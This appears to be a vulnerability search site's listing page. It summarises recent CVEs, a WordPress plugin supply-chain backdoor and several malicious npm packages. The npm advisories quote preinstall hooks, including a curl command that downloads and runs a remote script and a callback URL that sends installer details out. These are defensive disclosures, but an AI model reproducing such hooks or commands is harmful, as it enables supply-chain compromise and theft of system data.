CVE Search Engine - Security Vulnerabilities and Exploits Search Tool

NVD•added yesterday•7 views

CVE-2026-11994

Akaunting 3.1.21 contains an authenticated stored Cross-Site Scripting vulnerability in the report management workflow. A user with permission to create or update reports can store arbitrary HTML/JavaScript in the description field of a report...

4.8CVSS

Exploits0References2

NVD•added yesterday•8 views

CVE-2026-12249

An issue was discovered in Canonical ADSys upstream versions through v0.16.2. During Active Directory Certificate Services AD CS certificate auto-enrollment via the vendored Samba client script internal/policies/certificate/python/vendorsamba/gp/gpcertautoenrollext.py, ADSys utilizes a plaintext...

9.5CVSS

Exploits0References2

NVD•added yesterday•6 views

CVE-2026-10789

A maliciously crafted webpage, when visited by a user with Autodesk Fusion Desktop running and the MCP extension enabled, can trigger a vulnerability in the MCP extension that could allow arbitrary code execution. A successful exploit may allow code to execute with the privileges of the current...

9.6CVSS

Exploits0References3

Qualys Blog•added yesterday•5 views

CNAPP’s New Normal: Hyper-Prioritization and Autonomous Remediation at Cloud Scale

AI-powered detection has crossed a threshold. Security teams can now surface vulnerabilities, misconfigurations, and active attack paths at a speed and scale that was unimaginable a few years ago. The problem is no longer finding or knowing risk; it’s closing it fast enough to matter. Cloud...

5.4AI score

Exploits0

The Hacker News•added yesterday•10 views

ShapedPlugin WordPress Pro Plugins Backdoored in Supply Chain Attack

Multiple WordPress plugins from ShapedPlugin were compromised in a supply chain attack after unknown threat actors managed to tamper with the official release channels and push backdoor code. "Attackers compromised the vendor's build and distribution pipeline, injecting backdoor code into Pro...

10CVSS6.2AI score0.01239EPSS

Exploits2

ATTACKERKB•added yesterday•3 views

CVE-2026-11834

A command injection vulnerability has been identified in the DHCP option processing logic in multiple TP-Link router models, due to insufficient validation of externally supplied DHCP option data. An adjacent attacker may exploit this vulnerability by supplying crafted DHCP responses, potentially...

EUVD•added yesterday•5 views

Exploits0References8

EUVD-2026-38339

Vulnrichment•added yesterday•4 views

CVE-2026-11834 Unauthenticated Command Injection via DHCP Option Handling in Multiple TP-Link Routers

CVE•added yesterday•6 views

CVE-2026-11834

CVE-2026-11834 describes a command-injection vulnerability in the DHCP option processing logic of multiple TP-Link routers, caused by insufficient validation of externally supplied DHCP option data. An adjacent attacker can exploit this by sending crafted DHCP responses, potentially during device...

Cvelist•added yesterday•21 views

CVE-2026-11834 Unauthenticated Command Injection via DHCP Option Handling in Multiple TP-Link Routers

8.7CVSS

Malicious code in zomato-mcp (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector a23c3c63a9064636250be7dffa3781af0f9cdfcfd11a8da875be470c6952033e On npm install, the package's preinstall lifecycle script runs curl against http://d8s0b82plbq3u5sb2vo0sb3a9obr4yjt7.oast.site/install/ carrying the...

6AI score

Malicious code in zomato-espresso (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 860464bbcd3d56375d93025e494e39a6652bb7d115fb581ee088474a66786c3d Package is a dependency-confusion lure targeting Zomato's internal namespace. package.json declares a preinstall hook that runs curl on every npm...

5.9AI score

MAL-2026-6269 Malicious code in zomato-espresso (npm)

5.9AI score

MAL-2026-6270 Malicious code in zomato-mcp (npm)

6AI score

Malicious code in zomato-core (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector d5042b2ca8b8b3ba1f073344762615dc532864913af3f54a16540d44dde97ba5 package.json declares a preinstall lifecycle hook that runs curl to POST the installer's hostname, whoami output, current working directory, and the...

5.8AI score

MAL-2026-6268 Malicious code in zomato-core (npm)

5.8AI score

Malicious code in sn-internal-testjgsakjdkjadkjah (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector fd1a751946e8be92bbd0b675c57b3389e1e54919a69f5f6fef414a16cc2f1261 package.json declares a preinstall lifecycle script that runs curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js. On npm install, th...

6.7AI score

Exploits0References5

MAL-2026-6265 Malicious code in sn-internal-testjgsakjdkjadkjah (npm)

6.7AI score

Exploits0References5